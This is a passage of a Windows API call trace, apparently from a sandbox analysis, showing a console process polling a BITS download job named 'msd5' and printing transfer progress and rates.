[0065.163] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16e654, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e654*=0xc) returned 1
[0065.163] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.163] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e64c | out: lpConsoleScreenBufferInfo=0x16e64c) returned 1
[0065.163] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e664, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e664*=0xa) returned 1
[0065.163] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.164] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e634 | out: lpConsoleScreenBufferInfo=0x16e634) returned 1
[0065.164] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e64c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e64c*=0xa) returned 1
[0065.164] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.164] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e63c | out: lpConsoleScreenBufferInfo=0x16e63c) returned 1
[0065.164] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e654, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e654*=0x8) returned 1
[0065.164] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.165] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e660 | out: _Buffer="0") returned 1
[0065.165] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e66c | out: _Buffer="1") returned 1
[0065.165] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e63c | out: lpConsoleScreenBufferInfo=0x16e63c) returned 1
[0065.165] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16e654, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e654*=0x5) returned 1
[0065.165] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.165] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e644 | out: lpConsoleScreenBufferInfo=0x16e644) returned 1
[0065.165] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e65c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e65c*=0x8) returned 1
[0065.166] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.166] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16e668 | out: _Buffer="0") returned 1
[0065.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16e65c | out: lpSystemTimeAsFileTime=0x16e65c*(dwLowDateTime=0xd7817930, dwHighDateTime=0x1d469c7))
[0065.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16e654 | out: lpSystemTimeAsFileTime=0x16e654*(dwLowDateTime=0xd7817930, dwHighDateTime=0x1d469c7))
[0065.166] _finite (_X=0x0) returned 0
[0065.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e614 | out: lpConsoleScreenBufferInfo=0x16e614) returned 1
[0065.166] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x16e62c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e62c*=0xd) returned 1
[0065.166] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.166] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e620 | out: lpConsoleScreenBufferInfo=0x16e620) returned 1
[0065.167] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16e638, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e638*=0xf) returned 1
[0065.167] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.167] _vsnwprintf (in: _Buffer=0x16e44c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x16e410 | out: _Buffer="0.00 B/S") returned 8
[0065.167] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e664 | out: lpConsoleScreenBufferInfo=0x16e664) returned 1
[0065.167] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e67c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e67c*=0x8) returned 1
[0065.167] CoTaskMemFree (pv=0x2583a8)
[0065.168] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0065.168] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0065.168] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16f700 | out: lpMode=0x16f700) returned 1
[0065.168] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b1) returned 1
[0065.169] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f740*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0065.281] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 1
[0065.281] TranslateMessage (lpMsg=0x16f718) returned 0
[0065.281] DispatchMessageW (lpMsg=0x16f718) returned 0x1
[0065.281] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0065.281] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0065.296] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc6
[0065.296] IBackgroundCopyJob:GetType (in: This=0x24a62c, pVal=0x16ede0 | out: pVal=0x16ede0) returned 0x0
[0065.297] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0065.297] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0065.298] IBackgroundCopyJob:GetProgress (in: This=0x24a62c, pVal=0x260cd0 | out: pVal=0x260cd0) returned 0x0
[0065.299] IBackgroundCopyJob:GetPriority (in: This=0x24a62c, pVal=0x16eddc | out: pVal=0x16eddc) returned 0x0
[0065.299] CoTaskMemFree (pv=0x0)
[0065.299] IBackgroundCopyJob:GetDisplayName (in: This=0x24a62c, pVal=0x16edf4 | out: pVal=0x16edf4*="msd5") returned 0x0
[0065.300] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed9c | out: lpConsoleScreenBufferInfo=0x16ed9c) returned 1
[0065.300] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16edb4 | out: lpNumberOfCharsWritten=0x16edb4) returned 1
[0065.300] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16edb4 | out: lpNumberOfAttrsWritten=0x16edb4) returned 1
[0065.300] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0065.301] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.301] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0065.301] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0xa) returned 1
[0065.301] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.301] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0065.301] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x5) returned 1
[0065.302] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.302] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0065.302] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0x7) returned 1
[0065.302] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.302] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed80 | out: lpConsoleScreenBufferInfo=0x16ed80) returned 1
[0065.303] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed98, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed98*=0x8) returned 1
[0065.303] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.303] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0065.303] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0x8) returned 1
[0065.303] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.304] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.304] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0xc) returned 1
[0065.304] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.304] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0065.304] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0xa) returned 1
[0065.305] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.305] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed74 | out: lpConsoleScreenBufferInfo=0x16ed74) returned 1
[0065.305] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ed8c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed8c*=0xa) returned 1
[0065.305] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.305] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.305] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x8) returned 1
[0065.306] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.306] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda0 | out: _Buffer="0") returned 1
[0065.306] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="1") returned 1
[0065.306] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.306] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x5) returned 1
[0065.306] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.307] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0065.307] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x8) returned 1
[0065.307] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.307] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="0") returned 1
[0065.307] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="937984") returned 6
[0065.307] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="0") returned 1
[0065.307] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ed94 | out: lpSystemTimeAsFileTime=0x16ed94*(dwLowDateTime=0xd796e590, dwHighDateTime=0x1d469c7))
[0065.307] _finite (_X=0x0) returned 1
[0065.307] _finite (_X=0x0) returned 1
[0065.307] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed54 | out: lpConsoleScreenBufferInfo=0x16ed54) returned 1
[0065.308] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x16ed6c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed6c*=0x11) returned 1
[0065.308] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.308] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed60 | out: lpConsoleScreenBufferInfo=0x16ed60) returned 1
[0065.308] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16ed78, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed78*=0xf) returned 1
[0065.308] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.309] _vsnwprintf (in: _Buffer=0x16eb8c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x16eb50 | out: _Buffer="0.00 B/S") returned 8
[0065.309] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eda4 | out: lpConsoleScreenBufferInfo=0x16eda4) returned 1
[0065.309] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16edbc, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16edbc*=0x8) returned 1
[0065.309] CoTaskMemFree (pv=0x2583d0)
[0065.309] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 0
[0065.310] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x16f740*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0065.819] PeekMessageW (in: lpMsg=0x16f718, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x16f718) returned 1
[0065.819] TranslateMessage (lpMsg=0x16f718) returned 0
[0065.819] DispatchMessageW (lpMsg=0x16f718) returned 0x1
[0065.820] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0065.820] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0065.821] KillTimer (hWnd=0x0, uIDEvent=0x7fc6) returned 1
[0065.821] IBackgroundCopyJob:GetType (in: This=0x24a62c, pVal=0x16ede0 | out: pVal=0x16ede0) returned 0x0
[0065.822] IBackgroundCopyJob:GetProgress (in: This=0x24a62c, pVal=0x260cd0 | out: pVal=0x260cd0) returned 0x0
[0065.824] IBackgroundCopyJob:GetPriority (in: This=0x24a62c, pVal=0x16eddc | out: pVal=0x16eddc) returned 0x0
[0065.828] CoTaskMemFree (pv=0x0)
[0065.828] IBackgroundCopyJob:GetDisplayName (in: This=0x24a62c, pVal=0x16edf4 | out: pVal=0x16edf4*="msd5") returned 0x0
[0065.829] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed9c | out: lpConsoleScreenBufferInfo=0x16ed9c) returned 1
[0065.829] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16edb4 | out: lpNumberOfCharsWritten=0x16edb4) returned 1
[0065.829] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16edb4 | out: lpNumberOfAttrsWritten=0x16edb4) returned 1
[0065.829] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0065.830] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0065.830] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0xa) returned 1
[0065.830] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.830] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0065.830] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x5) returned 1
[0065.831] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0065.831] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0x7) returned 1
[0065.831] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed80 | out: lpConsoleScreenBufferInfo=0x16ed80) returned 1
[0065.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed98, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed98*=0x8) returned 1
[0065.832] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.832] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed88 | out: lpConsoleScreenBufferInfo=0x16ed88) returned 1
[0065.832] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16eda0, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda0*=0x8) returned 1
[0065.832] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.832] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0xe) returned 1
[0065.833] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.833] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed8c | out: lpConsoleScreenBufferInfo=0x16ed8c) returned 1
[0065.833] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16eda4, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16eda4*=0xa) returned 1
[0065.834] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed74 | out: lpConsoleScreenBufferInfo=0x16ed74) returned 1
[0065.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16ed8c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed8c*=0xa) returned 1
[0065.834] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.835] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.835] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x8) returned 1
[0065.835] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.835] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda0 | out: _Buffer="0") returned 1
[0065.835] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="1") returned 1
[0065.835] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed7c | out: lpConsoleScreenBufferInfo=0x16ed7c) returned 1
[0065.835] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16ed94, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed94*=0x5) returned 1
[0065.836] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed84 | out: lpConsoleScreenBufferInfo=0x16ed84) returned 1
[0065.836] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16ed9c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed9c*=0x8) returned 1
[0065.836] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.837] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="252182") returned 6
[0065.837] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16edac | out: _Buffer="937984") returned 6
[0065.837] _vsnwprintf (in: _Buffer=0x5103f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x16eda8 | out: _Buffer="26") returned 2
[0065.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ed94 | out: lpSystemTimeAsFileTime=0x16ed94*(dwLowDateTime=0xd7e7d450, dwHighDateTime=0x1d469c7))
[0065.837] _finite (_X=0x78fbbd83) returned 1
[0065.837] _finite (_X=0x87e36b0f) returned 1
[0065.837] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed54 | out: lpConsoleScreenBufferInfo=0x16ed54) returned 1
[0065.837] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x16ed6c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed6c*=0x17) returned 1
[0065.837] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.838] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed60 | out: lpConsoleScreenBufferInfo=0x16ed60) returned 1
[0065.838] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x16ed78, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed78*=0xf) returned 1
[0065.838] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.838] _vsnwprintf (in: _Buffer=0x16eb8c, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x16eb50 | out: _Buffer="325.02 KB/S") returned 11
[0065.838] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed58 | out: lpConsoleScreenBufferInfo=0x16ed58) returned 1
[0065.839] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16ed70, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16ed70*=0xc) returned 1
[0065.839] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.839] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ed60 | out: lpConsoleScreenBufferInfo=0x16ed60) returned 1
